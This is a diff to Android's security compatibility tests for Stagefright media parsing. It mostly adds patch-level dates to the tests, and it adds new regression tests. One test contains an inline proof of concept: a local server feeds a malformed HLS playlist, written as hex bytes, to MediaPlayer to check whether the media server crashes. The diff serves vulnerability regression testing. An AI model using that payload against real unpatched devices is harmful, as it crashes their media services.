doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_25812590() throws Exception {
doStagefrightTest(R.raw.bug_25812590);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6600() throws Exception {
doStagefrightTest(R.raw.cve_2015_6600);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6603() throws Exception {
doStagefrightTest(R.raw.cve_2015_6603);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6604() throws Exception {
doStagefrightTest(R.raw.cve_2015_6604);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-12")
public void testStagefright_bug_24157524() throws Exception {
- doStagefrightTest(R.raw.bug_24157524);
+ doStagefrightTestMediaCodec(R.raw.bug_24157524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3871() throws Exception {
doStagefrightTest(R.raw.cve_2015_3871);
}
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26070014() throws Exception {
doStagefrightTest(R.raw.bug_26070014);
}
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_32915871() throws Exception {
doStagefrightTest(R.raw.bug_32915871);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_bug_28333006() throws Exception {
doStagefrightTest(R.raw.bug_28333006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_14388161() throws Exception {
doStagefrightTestMediaPlayer(R.raw.bug_14388161);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3755() throws Exception {
doStagefrightTest(R.raw.cve_2016_3755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testStagefright_cve_2016_3878_b_29493002() throws Exception {
doStagefrightTest(R.raw.cve_2016_3878_b_29493002);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_36819262() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36819262_mpeg2, "video/mpeg2", 640, 480);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_cve_2015_6608_b_23680780() throws Exception {
doStagefrightTest(R.raw.cve_2015_6608_b_23680780);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36715268() throws Exception {
doStagefrightTest(R.raw.bug_36715268);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_bug_27855419_CVE_2016_2463() throws Exception {
doStagefrightTest(R.raw.bug_27855419);
}
+ @SecurityTest(minPatchLevel = "2015-11")
public void testStagefright_bug_19779574() throws Exception {
doStagefrightTest(R.raw.bug_19779574);
}
@@ -782,42 +788,127 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
+ public void testStagefright_bug_68342866() throws Exception {
+ Thread server = new Thread() {
+ @Override
+ public void run() {
+ try (ServerSocket serverSocket = new ServerSocket(8080);
+ Socket conn = serverSocket.accept()) {
+ OutputStream outputstream = conn.getOutputStream();
+ InputStream inputStream = conn.getInputStream();
+ byte input[] = new byte[65536];
+ inputStream.read(input, 0, 65536);
+ String inputStr = new String(input);
+ if (inputStr.contains("bug_68342866.m3u8")) {
+ byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n")
+ .getBytes();
+ byte playlist[] = new byte[] { 0x23, 0x45, 0x58, 0x54,
+ 0x4D, 0x33, 0x55, 0x0A, 0x23, 0x45, 0x58, 0x54,
+ 0x2D, 0x58, 0x2D, 0x53, 0x54, 0x52, 0x45, 0x41,
+ 0x4D, 0x2D, 0x49, 0x4E, 0x46, 0x46, 0x43, 0x23,
+ 0x45, 0x3A, 0x54, 0x42, 0x00, 0x00, 0x00, 0x0A,
+ 0x00, 0x00, 0x00, 0x00, 0x00, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, (byte) 0xFF,
+ (byte) 0xFF, (byte) 0xFF, 0x3F, 0x2C, 0x4E,
+ 0x46, 0x00, 0x00 };
+ outputstream.write(http);
+ outputstream.write(playlist);
+ }
+ } catch (IOException e) {
+ }
+ }
+ };
+ server.start();
+ String uri = "http://127.0.0.1:8080/bug_68342866.m3u8";
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread t = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ mp.setOnPreparedListener(mpcl);
+ mp.setOnCompletionListener(mpcl);
+ Surface surface = getDummySurface();
+ mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
+ try {
+ mp.setDataSource(uri);
+ mp.prepareAsync();
+ } catch (IOException e) {
+ Log.e(TAG, e.toString());
+ } finally {
+ closeQuietly(fd);
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ t.start();
+ assertFalse("Device *IS* vulnerable to BUG-68342866",
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ t.stopLooper();
+ t.join();
+ server.join();
+ }
+
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testStagefright_bug_74114680() throws Exception {
+ doStagefrightTest(R.raw.bug_74114680_ts, (10 * 60 * 1000));
+ }
+
+ @SecurityTest(minPatchLevel = "2018-03")
+ public void testStagefright_bug_70239507() throws Exception {
+ doStagefrightTestExtractorSeek(R.raw.bug_70239507,1311768465173141112L);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-03")
+ public void testBug_33250932() throws Exception {
+ int[] frameSizes = {65, 11, 102, 414};
+ doStagefrightTestRawBlob(R.raw.bug_33250932_avc, "video/avc", 640, 480, frameSizes);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-08")
+ public void testStagefright_bug_37430213() throws Exception {
+ doStagefrightTest(R.raw.bug_37430213);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-11")
public void testStagefright_bug_68664359() throws Exception {
doStagefrightTest(R.raw.bug_68664359, 60000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-11")
public void testStagefright_bug_110435401() throws Exception {
doStagefrightTest(R.raw.bug_110435401, 60000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_cve_2017_0474() throws Exception {
doStagefrightTest(R.raw.cve_2017_0474, 120000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0765() throws Exception {
doStagefrightTest(R.raw.cve_2017_0765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6764() throws Exception {
doStagefrightTest(R.raw.cve_2016_6764);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_13214() throws Exception {
doStagefrightTest(R.raw.cve_2017_13214);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35467107() throws Exception {
doStagefrightTest(R.raw.bug_35467107);
}
@@ -827,23 +918,23 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testBug_65186291() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_65186291_framelen);
doStagefrightTestRawBlob(R.raw.bug_65186291_hevc, "video/hevc", 1920, 1080, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_67737022() throws Exception {
doStagefrightTest(R.raw.bug_67737022);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_37093318() throws Exception {
doStagefrightTest(R.raw.bug_37093318, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-05")
public void testStagefright_bug_73172046() throws Exception {
doStagefrightTest(R.raw.bug_73172046);
@@ -855,56 +946,68 @@
}
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0824() throws Exception {
doStagefrightTest(R.raw.cve_2016_0824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_cve_2016_0815() throws Exception {
doStagefrightTest(R.raw.cve_2016_0815);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testStagefright_cve_2016_2454() throws Exception {
doStagefrightTest(R.raw.cve_2016_2454);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6765() throws Exception {
doStagefrightTest(R.raw.cve_2016_6765);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2508() throws Exception {
doStagefrightTest(R.raw.cve_2016_2508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_cve_2016_6699() throws Exception {
doStagefrightTest(R.raw.cve_2016_6699);
}
- @SecurityTest
- public void testStagefright_bug_65484460() throws Exception {
- doStagefrightTest(R.raw.bug_65484460);
- }
-
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_cve_2017_18155() throws Exception {
doStagefrightTest(R.raw.cve_2017_18155);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-07")
public void testStagefright_cve_2018_9423() throws Exception {
doStagefrightTest(R.raw.cve_2018_9423);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testStagefright_cve_2016_3879() throws Exception {
doStagefrightTest(R.raw.cve_2016_3879);
}
+ @SecurityTest(minPatchLevel = "2017-07")
+ public void testStagefright_xaac_not_present() throws Exception {
+ // ensure that the xaac codec is not present
+ MediaCodec codec;
+ String names[] = new String[] { "c2.android.xaac.decoder", "OMX.google.xaac.decoder" };
+ for (String name : names) {
+ Log.w(TAG, "trying to create codec: " + name);
+ try {
+ codec = MediaCodec.createByCodecName(name);
+ fail("not allowed to createByCodecName() for " + name);
+ } catch (IllegalArgumentException e) {
+ // expected
+ Log.w(TAG, "correctly unable to instantiate code for " + name);
+ }
+ }
+ }
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
@@ -1388,34 +1491,37 @@
doStagefrightTestRawBlob(R.raw.bug_36215950, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug36816007() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36816007, "video/avc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-05")
public void testBug36895511() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36895511, "video/hevc", 320, 240);
}
+ @SecurityTest(minPatchLevel = "2017-11")
public void testBug64836894() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_64836894, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testCve_2017_0687() throws Exception {
doStagefrightTestRawBlob(R.raw.cve_2017_0687, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_37930177() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37930177_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_37712181() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_37712181_hevc, "video/hevc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testBug_70897394() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_70897394_avc, "video/avc", 320, 240);
}
@@ -1752,4 +1858,68 @@
t.stopLooper();
t.join(); // wait for thread to exit so we're sure the player was released
}
+
+ private void doStagefrightTestExtractorSeek(final int rid, final long offset) throws Exception {
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+ LooperThread thr = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ try {
+ AssetFileDescriptor fd = getInstrumentation().getContext().getResources()
+ .openRawResourceFd(R.raw.good);
+ mp.setDataSource(fd.getFileDescriptor(),
+ fd.getStartOffset(),
+ fd.getLength());
+ fd.close();
+ } catch (Exception e) {
+ fail("setDataSource of known-good file failed");
+ }
+ synchronized(mpcl) {
+ mpcl.notify();
+ }
+ Looper.loop();
+ mp.release();
+ }
+ });
+ thr.start();
+ synchronized(mpcl) {
+ mpcl.wait();
+ }
+ Resources resources = getInstrumentation().getContext().getResources();
+ MediaExtractor ex = new MediaExtractor();
+ AssetFileDescriptor fd = resources.openRawResourceFd(rid);
+ try {
+ ex.setDataSource(fd.getFileDescriptor(), fd.getStartOffset(), fd.getLength());
+ } catch (IOException e) {
+ } finally {
+ closeQuietly(fd);
+ }
+ int numtracks = ex.getTrackCount();
+ String rname = resources.getResourceEntryName(rid);
+ Log.i(TAG, "start mediaextractor test for: " + rname + ", which has " + numtracks + " tracks");
+ for (int t = 0; t < numtracks; t++) {
+ try {
+ ex.selectTrack(t);
+ } catch (IllegalArgumentException e) {
+ Log.w(TAG, "couldn't select track " + t);
+ }
+ ex.seekTo(0, MediaExtractor.SEEK_TO_CLOSEST_SYNC);
+ ex.advance();
+ ex.seekTo(offset, MediaExtractor.SEEK_TO_NEXT_SYNC);
+ try
+ {
+ ex.unselectTrack(t);
+ }
+ catch (Exception e) {
+ }
+ }
+ ex.release();
+ String cve = rname.replace("_", "-").toUpperCase();
+ assertFalse("Device *IS* vulnerable to " + cve,
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ thr.stopLooper();
+ thr.join();
+ }
}
diff --git a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
index ef9316f..d0afec0 100644
--- a/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
+++ b/tests/tests/security/src/android/security/cts/VisualizerEffectTest.java
@@ -39,7 +39,7 @@
}
//Testing security bug: 30229821
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizer_MalformedConstructor() throws Exception {
final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
final int VISUALIZER_CMD_MEASURE = 0x10001;
diff --git a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
index fc28247..5368e93 100644
--- a/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
+++ b/tests/tests/security/src/android/security/cts/ZeroHeightTiffTest.java
@@ -33,7 +33,7 @@
* Prior to fixing bug 33300701, decoding resulted in undefined behavior (divide by zero).
* With the fix, decoding will fail, without dividing by zero.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void test_android_bug_33300701() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33300701);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
